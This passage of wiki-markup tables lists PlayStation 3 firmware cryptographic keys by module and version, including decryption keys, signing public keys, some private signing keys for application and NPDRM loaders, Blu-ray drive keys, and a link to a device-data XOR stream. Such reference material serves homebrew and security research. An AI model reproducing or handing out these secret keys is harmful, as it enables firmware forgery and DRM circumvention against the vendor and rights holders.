&lt;code&gt;934861FF0D4BAF7141B658D1D84441D413060D7E534E99E357B5090EECFB34D947694ADB9F6E7D3F&lt;/code&gt; || - || &lt;code&gt;0x22&lt;/code&gt;<br /> |-<br /> | spp_verifier || 3.70-3.74 || &lt;code&gt;4B1A459AF1D484DABD727BD316351A9A1B3404E9B1DE925B95527166DB3BB2D0&lt;/code&gt; || &lt;code&gt;3B6203C2730D283F978A12D5390DD747&lt;/code&gt; || &lt;code&gt;0AEEB187EA76913765A15A435F2F1B15545F60794FB5244DC54801B6BABD497565ED6BF57C1A80C8&lt;/code&gt; || - || &lt;code&gt;0x23&lt;/code&gt;<br /> |-<br /> | spp_verifier || 4.00-4.11 || &lt;code&gt;11FA6344E869787209E6806E66A7799F7128BD98AEAE95B386D4C88EDDDB3FEF&lt;/code&gt; || &lt;code&gt;67B49380C74FFB15AD929E8C819586AD&lt;/code&gt; || &lt;code&gt;5E028AC83D1BF838CEC43CA11969C72533A057BB0C3CB4A571F8E08DD5DF793CD1E1270CA6E89FB3&lt;/code&gt; || - || &lt;code&gt;0x04&lt;/code&gt;<br /> |-<br /> | spp_verifier || 4.20-{{latest}} || &lt;code&gt;D2961BBFFEDAEE269B061454D6ACF262CD71BC6F5320180F0A04A07583CCF7C5&lt;/code&gt; || &lt;code&gt;6D308B59BC9054B12C833359D31BAE77&lt;/code&gt; || &lt;code&gt;0CDD0D1541A6B0DFD12E951578536CA60C93853B88FCE17592DC8D134B08A94AF8BB08667E2D70A5&lt;/code&gt; || - || &lt;code&gt;0x07&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===RvkLdr===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | rvklist&lt;br /&gt;(Internal) || - {{SD}} || &lt;code&gt;FEDCBA98765432100123456789ABCDEFFEDCBA98765432100123456789ABCDEF&lt;/code&gt; || &lt;code&gt;0123456789ABCDEFFEDCBA9876543210&lt;/code&gt; || &lt;code&gt;123DA14B3D21D82AFC759A9CF6F41610A24EC8704306BAC4E0941A5B70EEA037F1482EA7EC578872&lt;/code&gt; || &lt;code&gt;000000000000000000000000000000000001000000&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | rvklist || 030.001-3.55 || &lt;code&gt;03AF06FD1CE6DA366361682CDF59F9708B5D7876F40A9E1E9AC2B22F51B60BDF&lt;/code&gt; || &lt;code&gt;8B5D7876F40A9E1E9AC2B22F51B60BDF&lt;/code&gt; || &lt;code&gt;9ADE7830EB74245EC357CE4F6401633E5A8048FD865F9D8F1A9189535A37623E2921427463A754F7&lt;/code&gt; || &lt;code&gt;00245E673B039D656DA206BDAE4EAEFCBF2A8D5EAF&lt;/code&gt; || &lt;code&gt;0x29&lt;/code&gt;<br /> |-<br /> | rvklist || 3.56 || &lt;code&gt;22628A9EC4C414D5B32F2B4BA4926089DE9A461B190FB3E4392D057C525535DE&lt;/code&gt; || &lt;code&gt;D5D4B8ED62B6CCA0249A79776E136975&lt;/code&gt; || &lt;code&gt;51751B9F1DA58638D2D99F67E20A1D4A454C5B042CD1D0A449A2989808002BA68FB5B7F4B5B4E63B&lt;/code&gt; || - || &lt;code&gt;0x32&lt;/code&gt;<br /> |-<br /> | rvklist || 3.60-3.61 || &lt;code&gt;BCFEDBE01D445CDEF335C543703D8E9C1199FAC33DC4595D7382EAF54EF9C4C3&lt;/code&gt; || &lt;code&gt;B20A23079516205525683D8058379CBF&lt;/code&gt; || &lt;code&gt;9859B677A5B8FCCA31A6FBA2E3220EE5E207343A58EEEE6B6CB260EB5E971352C45428E8C8398BE6&lt;/code&gt; || - || &lt;code&gt;0x33&lt;/code&gt;<br /> |-<br /> | rvklist || 3.65-3.66 || &lt;code&gt;1EBD693BD813ADDA2203DAEE0441F4146C174F68F532B3E43A48F029230EF70C&lt;/code&gt; || &lt;code&gt;501819323BFCF9FB99396B46B70A97E7&lt;/code&gt; || &lt;code&gt;6563EA3D5694A913F24059A57B2A3645C7C8A587CF20075EFD978A048CAD7A68A8EB7E6BC4BC5448&lt;/code&gt; || - || &lt;code&gt;0x30&lt;/code&gt;<br /> |-<br /> | rvklist || 3.70-3.74 || &lt;code&gt;4AF39F7A4E214ECB270416EDD17113A23DC5AD2EDAA5FC91817EE171CDB8B9F4&lt;/code&gt; || &lt;code&gt;0E5CB28FA2666E3ED45289DABC67DDC2&lt;/code&gt; || &lt;code&gt;758BBF611ED6BB8C32D2A49A7AD456D585D11C74926F977737EE309F213D971404A8F9022B409371&lt;/code&gt; || - || &lt;code&gt;0x31&lt;/code&gt;<br /> |-<br /> | rvklist || 4.00-4.11 || &lt;code&gt;99E8959A4363BE9EBDBC2B9C73BCBBE627BF112883E650E3F95879C0BFFB103E&lt;/code&gt; || &lt;code&gt;182CC801794A2F7027BB76D29D598550&lt;/code&gt; || &lt;code&gt;6319A4B7D99FD3A3332CB13F3DE44A898B6A4CF04B9C15E6166AFC7C5272AF7A4DE04E802FD2C71C&lt;/code&gt; || - || &lt;code&gt;0x02&lt;/code&gt;<br /> |-<br /> | rvklist || 4.20-{{latest}} || &lt;code&gt;695984b7ee2ec2f77fcc3120150dce7e4480d84480ddd8c5940aeb6f79e63d17&lt;/code&gt; || &lt;code&gt;a8ba3e4e63b2bb06fc0ce57e3bb8fc46&lt;/code&gt; || &lt;code&gt;7f1950c6e497e922400586ee338b41e01c906c5a6dfd75feb5249cfa4bec534f5ca679670a452b2a&lt;/code&gt; || - || &lt;code&gt;0x12&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===Spu Pkg Rvk Verifier===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | spu_pkg_rvk_verifier&lt;br /&gt;(Internal) || - {{SD}} || &lt;code&gt;FEDCBA98765432100123456789ABCDEFFEDCBA98765432100123456789ABCDEF&lt;/code&gt; || &lt;code&gt;0123456789ABCDEFFEDCBA9876543210&lt;/code&gt; || &lt;code&gt;123DA14B3D21D82AFC759A9CF6F41610A24EC8704306BAC4E0941A5B70EEA037F1482EA7EC578872&lt;/code&gt; || &lt;code&gt;000000000000000000000000000000000001000000&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | spu_pkg_rvk_verifier || 0.80-3.55 (pkg) || &lt;code&gt;A97818BD193A67A16FE83A855E1BE9FB5640938D4DBCB2CB52C5A2F8B02B1031&lt;/code&gt; || &lt;code&gt;4ACEF01224FBEEDF8245F8FF10211E6E&lt;/code&gt; || &lt;code&gt;41DA1A8F74FF8D3F1CE20EF3E9D8865C96014FE373CA143C9BADEDF2D9D3C7573307115CCFE04F13 &lt;/code&gt; || &lt;code&gt;00542D46E7B3DAAC8AEB81E533873AABD6D74BB710 &lt;/code&gt; || &lt;code&gt;0x23&lt;/code&gt;<br /> |-<br /> | spu_pkg_rvk_verifier || 3.56-{{latest}} (spkg) || &lt;code&gt;F8F99006F1C007D5D0B1909E9566E0E70B569399FC3394A811809FDB5CAE92CD&lt;/code&gt; || &lt;code&gt;59D28DB4ADDFB40B7D768BC9667C67B1&lt;/code&gt; || &lt;code&gt;5432BDDD1F97418147AFF016EAA6100834F2CAA8C498B88965689EE44DF349B066CD43CBF4F2C5D0&lt;/code&gt; || - || &lt;code&gt;0x17&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===Updater (CEB units Ebootroms)=== <br /> Although these keysets are using 256 bits ERK, the algorithm used for the decryption is AES128CTR therefore only the first 16bytes of the ERK are used (ERK are truncated)<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! ERK !! RIV<br /> |-<br /> | updater || E/rXXX || &lt;code&gt;D9580C4D6349692159CDDFC33F53908B99817C618D61549DDDEA247E57788920&lt;/code&gt; || &lt;code&gt;CB445249CE6A9FEB01DF02C7B94938E1&lt;/code&gt;<br /> |-<br /> | individual_info || E/rXXX || &lt;code&gt;987C95CC38C286D0E36252B867BCEBA1D0BE92DE84F83A26DE1E670683066243&lt;/code&gt; || &lt;code&gt;1AAEBF3ED6EB1B295DAC75963DB37651&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===toolupdatedec (Communication Processor Updater binary)===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Target !! Filename !! ERK !! RIV<br /> |-<br /> | toolupdatedec || TCP510/TCP520 || reftool_cp_xxx.bin || &lt;code&gt;E8ED2B817207B70C5DF9090507AF2A8982967620D692B92A59231638402DF13F&lt;/code&gt; || &lt;code&gt;File dependant (the first 16 bytes of the file)&lt;/code&gt;<br /> |-<br /> | toolupdatedec || DTP-T1000 || psptoolupdate.bin || &lt;code&gt;A400C48628A7A5294D11AE3BB2587AEA32E501C63E49D1DCAA19B5AEB092F3DB&lt;/code&gt; || &lt;code&gt;File dependant (the first 16 bytes of the file)&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> === PS3 Suffix for NIDS ===<br /> &lt;pre&gt;<br /> 6759659904250490566427499489741A<br /> &lt;/pre&gt;<br /> <br /> === Bluray Drive Keys (retrieved from bluray drive firmware) ===<br /> <br /> 5BCE24712335AF70E570F6559A29F34DE7BBC42D97DE7554CE0264E41CA3171F<br /> 97EC3F4F8751F22B7FFCACA83803EAF7<br /> <br /> or<br /> <br /> E7BBC42D97DE7554CE0264E41CA3171F97EC3F4F8751F22B7FFCACA83803EAF7<br /> 5BCE24712335AF70E570F6559A29F34D<br /> <br /> * Bluray drive firmware uses same curve as KIRK 0xc 0xd 0x10 and 0x11 services.&lt;br /&gt;<br /> * Signature is at the bottom of the firmware. (0x7fd0) &lt;br /&gt;<br /> * it's highly likely to be cbc 256 aes<br /> <br /> XOR stream for descramble some encrypted areas inside bluray eeprom: http://pastebin.com/71Jx1hnE<br /> <br /> It can be used to decrypt emboot and another perdevice areas.<br /> <br /> === EID0 Section Keys ===<br /> <br /> Public key00: &lt;code&gt;94D100BE6E24991D65D93F3DA938858CEC2D133051F47DB4287AC86631719B31573EF7CCE071CA8A&lt;/code&gt;&lt;br /&gt;<br /> Curve00 sha1: &lt;code&gt;9035B33F58DFAEF389FD49187F93C4FC2D2DD268&lt;/code&gt; <br /> &lt;br&gt;Curve:<br /> &lt;pre&gt;<br /> A34D0C98B2A8DEA81E7C3FF0757C5B89<br /> 1B8523E1A34D0C98B2A8DEA81E7C3FF0<br /> 757C5B891B8523DE929F2B86E0F6525F<br /> FDC819D76D5F139A2F8A49B300A34D0C<br /> 98B2A8DEA81E7CEC7E21A8FF20DC9B8F<br /> AF755FD420216829E389548D397246E6<br /> 6DF2EC4B7C9B308B62B9CEFFA3F0071A<br /> 5C396F67FCE4A3A683<br /> &lt;/pre&gt;<br /> [https://twitter.com/naehrwert/status/286745714434899968 twitter]&lt;br /&gt;<br /> <br /> Public key06: &lt;code&gt;06485FD029853B552F7EFDD67A2DE7A1A4E25537B2459D8786426D5B27EFA5A9311CB8ABABFA0ECE&lt;/code&gt;&lt;br /&gt;<br /> Curve type06: 2 (vsh)&lt;br /&gt;<br /> <br /> Public key0A: &lt;code&gt;4F0A2BC9987640860E22EE5D86087C9692470BDF59DC4C1F2E38F92CE7B66875B59ED10C9D84FA6A&lt;/code&gt;&lt;br /&gt;<br /> Curve type0A: 2 (vsh)&lt;br /&gt;<br /> <br /> === PSP ID-Storage Keys ===<br /> '''IDPS'''&lt;br /&gt;<br /> Public key00: &lt;code&gt;4004C80BD9C8BA38221065923E324B5F0EC165ED6CFF7D9F2C420B84DFDA6E96C0AEE29927BCAF1E&lt;/code&gt;&lt;br /&gt;<br /> Curve type00: 2 (vsh)&lt;br /&gt;<br /> Public key01: &lt;code&gt;06485FD029853B552F7EFDD67A2DE7A1A4E25537B2459D8786426D5B27EFA5A9311CB8ABABFA0ECE&lt;/code&gt; &lt;-Same as EID0 Public key06&lt;br /&gt;<br /> Curve type01: 2 (vsh)&lt;br /&gt;<br /> Public key02: &lt;code&gt;3F8C34F210AEC48E1520FF2A44899E054A0DA33DF8B9754B09C0EC7E61867A5126FE6926972196F5&lt;/code&gt;&lt;br /&gt;<br /> Curve type02: 2 (vsh)&lt;br /&gt;<br /> Public key03: &lt;code&gt;CCB3440DC4836DD519E13B2805B30870DCAEE462136B3888651A98E02B29FA0CD34F1616F1ED5786&lt;/code&gt;&lt;br /&gt;<br /> Curve type03: 2 (vsh)&lt;br /&gt;<br /> Public key04: &lt;code&gt;08B336925C2B445D03A9BE51B9AABF54E4CC142EA72A23BB8060B03B71CDE0772DE82AD8931648D6&lt;/code&gt;&lt;br /&gt;<br /> Curve type04: 2 (vsh)&lt;br /&gt;&lt;br /&gt;<br /> '''UMD'''&lt;br /&gt;<br /> Public key: &lt;code&gt;4F0A2BC9987640860E22EE5D86087C9692470BDF59DC4C1F2E38F92CE7B66875B59ED10C9D84FA6A&lt;/code&gt; &lt;-Same as EID0 Public key0A&lt;br /&gt;<br /> Curve type: 2 (vsh)&lt;br /&gt;<br /> <br /> === Appldr ===<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! selftype !! version !! revision !! fw !! type !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | style=&quot;background-color:#ACFCAC; color:#330033;&quot; | app Internal {{SD}} || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 0.80-0.92 || 0x00 || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 0.80++ || dec || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;014485445EC9926C50F613AE77D9C37AA99838CCEB6F75FA78E29A8C622E8011&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;A17D6A522CB1B08F97DA8A82E97C12F7&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;72C1034FC8E4C1707B7147B9E930FA3F28EBFE070B5EBFBAE4A666B498050929815CF727C6264573 &lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;008732ACD0889FF7480C5C7D9A5D3BF43C46F220F8&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#ACFCAC; color:#330033;&quot; | app || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 0.80-0.92 || 0x00 || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 0.80++ || dec || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;95F50019E7A68E341FA72EFDF4D60ED376E25CF46BB48DFDD1F080259DC93F04&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;4A0955D946DB70D691A640BB7FAECC4C&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;6F8DF8EBD0A1D1DB08B30DD3A951E3F1F27E34030B42C729C55555232D61B834B8BDFFB07E54B343 &lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;006C3E4CCB2C69A5AD7C6F60448E50C7F9184EEAF4&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0x21&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#ACFCAC; color:#330033;&quot; | app || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 0.92[[Talk:Keys#2.36_vs_3.30_appldr_key_79481839C4...|-2.36]]&lt;strike&gt;/3.31&lt;/strike&gt; || 0x01 || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 0.92++ || dec || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;79481839C406A632BDB4AC093D73D99AE1587F24CE7E69192C1CD0010274A8AB&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;6F0F25E1C8C4B7AE70DF968B04521DDA&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;94D1B7378BAFF5DFED269240A7A364ED68446741622E50BC6079B6E606A2F8E0A4C56E5CFF836526&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;003DE80167D2F0E9D30F2145144A558D1174F5410C&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;?-2.36&lt;/span&gt; || 0x02 || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;1.00++&lt;/span&gt; || dec || &lt;code&gt;4F89BE98DDD43CAD343F5BA6B1A133B0A971566F770484AAC20B5DD1DC9FA06A&lt;/code&gt; || &lt;code&gt;90C127A9B43BA9D8E89FE6529E25206F&lt;/code&gt; || &lt;code&gt;8CA6905F46148D7D8D84D2AFCEAE61B41E6750FC22EA435DFA61FCE6F4F860EE4F54D9196CA5290E&lt;/code&gt; || &lt;code&gt;00530446451C568968EBF7068B1F45C252D70EC942&lt;/code&gt; || &lt;code&gt;0x13&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;seven&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;?-2.36&lt;/span&gt; || 0x00 ? || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;=&amp;gt;0.85&amp;nbsp;&amp;lt;=3.30&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;D91166973979EA8694476B011AC62C7E9F37DA26DE1E5C2EE3D66E42B8517085&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt; &lt;code&gt;DC01280A6E46BC674B81A7E8801EBE6E&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;A0FC44108236141BF3517A662B027AFC1AC513A05690496C754DEB7D43BDC41B80FD75C212624EE4&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt; &lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x11&lt;/code&gt;&lt;!--// is not in 3.56 FIX //--&gt;<br /> |-<br /> | npdrm || ?-2.36 || 0x00 np || 1.00++ || dec || &lt;code&gt;8E737230C80E66AD0162EDDD32F1F774EE5E4E187449F19079437A508FCF9C86&lt;/code&gt; || &lt;code&gt;7AAECC60AD12AED90C348D8C11D2BED5&lt;/code&gt; || &lt;code&gt;05BF09CB6FD78050C78DE69CC316FF27C9F1ED66A45BFCE0A1E5A6749B19BD546BBB4602CF373440&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x0A&lt;/code&gt;<br /> |-<br /> | npdrm || 0.92-2.36 || 0x01 np || 1.00++ || dec || &lt;code&gt;F9EDD0301F770FABBA8863D9897F0FEA6551B09431F61312654E28F43533EA6B&lt;/code&gt; || &lt;code&gt;A551CCB4A42C37A734A2B4F9657D5540&lt;/code&gt; || &lt;code&gt;B05F9DA5F9121EE4031467E74C505C29A8E29D1022379EDFF0500B9AE480B5DAB4578A4C61C5D6BF&lt;/code&gt; || &lt;code&gt;00040AB47509BED04BD96521AD1B365B86BF620A98&lt;/code&gt; || &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;2.40-3.30&lt;/span&gt; || 0x03 || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;2.40++&lt;/span&gt; || dec || &lt;code&gt;C1E6A351FCED6A0636BFCB6801A0942DB7C28BDFC5E0A053A3F52F52FCE9754E&lt;/code&gt; || &lt;code&gt;E0908163F457576440466ACAA443AE7C&lt;/code&gt; || &lt;code&gt;50022D5D37C97905F898E78E7AA14A0B5CAAD5CE8190AE5629A10D6F0CF4173597B37A95A7545C92&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x0B&lt;/code&gt;<br /> |-<br /> | npdrm || 2.40-3.30 || 0x03 np || 2.40++ || dec || &lt;code&gt;1B715B0C3E8DC4C1A5772EBA9C5D34F7CCFE5B82025D453F3167566497239664&lt;/code&gt; || &lt;code&gt;E31E206FBB8AEA27FAB0D9A2FFB6B62F&lt;/code&gt; || &lt;code&gt;3F51E59FC74D6618D34431FA67987FA11ABBFACC7111811473CD9988FE91C43FC74605E7B8CB732D&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x08&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#ACFCAC; color:#330033;&quot; | app || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 3.40-3.42 || 0x04 || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 3.40++ || dec || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;838F5860CF97CDAD75B399CA44F4C214CDF951AC795298D71DF3C3B7E93AAEDA&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;7FDBB2E924D182BB0D69844ADC4ECA5B&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;1F140E8EF887DAB52F079A06E6915A6460B75CD256834A43FA7AF90C23067AF412EDAFE2C1778D69&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0074E922FDEE5DC4CDF22FC8D7986477F813400860&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0x14&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.40-3.42&lt;/span&gt; || 0x05 || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.40++&lt;/span&gt; || dec || &lt;code&gt;C109AB56593DE5BE8BA190578E7D8109346E86A11088B42C727E2B793FD64BDC&lt;/code&gt; || &lt;code&gt;15D3F191295C94B09B71EBDE088A187A&lt;/code&gt; || &lt;code&gt;B6BB0A84C649A90D97EBA55B555366F52381BB38A84C8BB71DA5A5A0949043C6DB249029A43156F7&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x15&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.40-3.42&lt;/span&gt; || 0x06 || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.40++&lt;/span&gt; || dec || &lt;code&gt;6DFD7AFB470D2B2C955AB22264B1FF3C67F180983B26C01615DE9F2ECCBE7F41&lt;/code&gt; || &lt;code&gt;24BD1C19D2A8286B8ACE39E4A37801C2&lt;/code&gt; || &lt;code&gt;71F46AC33FF89DF589A100A7FB64CEAC244C9A0CBBC1FDCE80FB4BF8A0D2E66293309CB8EE8CFA95&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x2C&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.40-3.42&lt;/span&gt; || 0x05 np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;=&amp;gt;3.40&amp;nbsp;&amp;lt;=3.42&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;B73111B0B00117E48DE5E2EE5E534C0F0EFFA4890BBB8CAD01EE0F848F91583E&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;86F56F9E5DE513894874B8BA253334B1&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;B0BA1A1AB9723BB4E87CED9637BE056066BC56E16572D43D0210A06411DBF8FEB8885CD912384AE5&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x12&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | npdrm || 3.40-3.42 || 0x04 np || 3.40++ || dec || &lt;code&gt;BB4DBF66B744A33934172D9F8379A7A5EA74CB0F559BB95D0E7AECE91702B706&lt;/code&gt; || &lt;code&gt;ADF7B207A15AC601110E61DDFC210AF6&lt;/code&gt; || &lt;code&gt;9C327471BAFF1F877AE4FE29F4501AF5AD6A2C459F8622697F583EFCA2CA30ABB5CD45D1131CAB30&lt;/code&gt; || &lt;code&gt;00B61A91DF4AB6A9F142C326BA9592B5265DA88856&lt;/code&gt; || &lt;code&gt;0x16&lt;/code&gt;<br /> |-<br /> | npdrm || 3.40-3.42 || 0x06 np || 3.40++ || dec || &lt;code&gt;8B4C52849765D2B5FA3D5628AFB17644D52B9FFEE235B4C0DB72A62867EAA020&lt;/code&gt; || &lt;code&gt;05719DF1B1D0306C03910ADDCE4AF887&lt;/code&gt; || &lt;code&gt;2A5D6C6908CA98FC4740D834C6400E6D6AD74CF0A712CF1E7DAE806E98605CC308F6A03658F2970E&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x29&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#ACFCAC; color:#330033;&quot; | app || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 3.50 || 0x07 || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 3.50++ || dec || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;945B99C0E69CAF0558C588B95FF41B232660ECB017741F3218C12F9DFDEEDE55&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;1D5EFBE7C5D34AD60F9FBC46A5977FCE&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;AB284CA549B2DE9AA5C903B75652F78D192F8F4A8F3CD99209415C0A84C5C9FD6BF3095C1C18FFCD&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;002CF896D35DB871D0E6A252E799876A70D043C23E&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0x15&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.50&lt;/span&gt; || 0x08 || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.50++&lt;/span&gt; || dec || &lt;code&gt;2C9E8969EC44DFB6A8771DC7F7FDFBCCAF329EC3EC070900CABB23742A9A6E13&lt;/code&gt; || &lt;code&gt;5A4CEFD5A9C3C093D0B9352376D19405&lt;/code&gt; || &lt;code&gt;6E82F6B54A0E9DEBE4A8B3043EE3B24CD9BBB62B4416B0482582E419A2552E29AB4BEA0A4D7FA2D5&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x16&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || 